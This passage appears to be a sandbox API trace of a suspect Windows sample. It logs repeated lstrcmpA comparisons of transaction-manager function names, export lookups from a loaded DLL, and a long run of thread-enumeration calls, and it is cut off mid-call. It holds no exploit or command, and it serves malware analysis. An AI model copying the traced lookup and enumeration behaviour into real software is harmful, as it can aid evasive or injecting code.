lpString2="GetEnlistmentRecoveryInformation") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0229.450] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0229.450] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0229.450] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0229.450] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0229.450] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0229.450] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0229.450] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0229.450] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0229.451] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0229.451] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0229.451] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0229.451] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0229.451] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0229.451] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0229.451] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0229.451] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0229.451] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0229.451] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0229.451] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0229.451] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0229.451] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0229.452] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0229.452] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0229.452] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0229.452] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0229.453] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0229.453] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0229.453] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0229.453] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0229.453] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0229.453] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0229.453] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0229.453] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0229.453] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0229.453] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0229.453] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0229.453] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0229.453] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0229.453] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0229.453] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0229.453] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0229.453] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0229.453] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0229.453] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0229.453] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0229.453] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0229.453] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0229.453] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0229.453] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0229.453] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0229.453] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0229.453] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0229.453] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0229.453] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0229.453] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0229.453] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0229.453] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0229.454] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0229.454] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0229.454] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0229.455] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0229.456] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0229.456] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0229.456] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0229.667] GetProcessHeap () returned 0x570000 [0229.667] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d45030 | out: hHeap=0x570000) returned 1 [0229.680] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0229.680] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0229.680] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x2d45030 [0229.682] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1e) returned 0x5788a0 [0229.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_dump_codec", cchWideChar=-1, lpMultiByteStr=0x5788a0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_dump_codec", lpUsedDefaultChar=0x0) returned 15 [0229.683] GetLastError () returned 0x0 [0229.683] SetLastError (dwErrCode=0x0) [0229.683] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_dump_codecW") returned 0x0 [0229.683] GetLastError () returned 0x7f [0229.683] SetLastError (dwErrCode=0x7f) [0229.683] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_dump_codecA") returned 0x0 [0229.683] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_dump_codec") returned 0x7ffc45f1a840 [0229.683] GetActiveWindow () returned 0x0 [0229.684] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d45030 | out: hHeap=0x570000) returned 1 [0229.684] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5788a0 | out: hHeap=0x570000) returned 1 [0229.684] GetCurrentProcessId () returned 0xf50 [0229.684] GetCurrentThreadId () returned 0xbe8 [0229.684] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0229.935] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.944] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.945] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.946] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.947] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.948] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.949] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.950] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.950] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.951] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.951] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.952] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.953] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.953] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.954] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.955] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.956] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.957] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.957] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.958] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.959] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.960] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.961] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.962] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.963] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.963] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0229.964] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.186] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.191] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.192] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.193] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.194] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.194] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.196] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.196] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.197] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.198] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.199] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.200] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.201] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.202] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.202] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.203] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.204] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.205] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.206] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.207] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.207] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.208] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.209] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.210] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.211] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.212] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.213] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.215] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.216] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.216] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.217] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.218] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.219] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.220] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.220] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.221] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.494] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.495] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.496] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.496] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.497] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.498] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.499] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.500] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.500] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.501] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.502] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.508] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.509] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.509] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.512] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.513] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.515] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.516] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.517] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.517] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.518] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.519] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.519] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.749] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.750] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.750] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.751] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.752] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.753] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.753] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.754] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.755] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.756] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.757] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.758] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.759] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0230.759] Thread32Next (hSnapshot=0x17c, 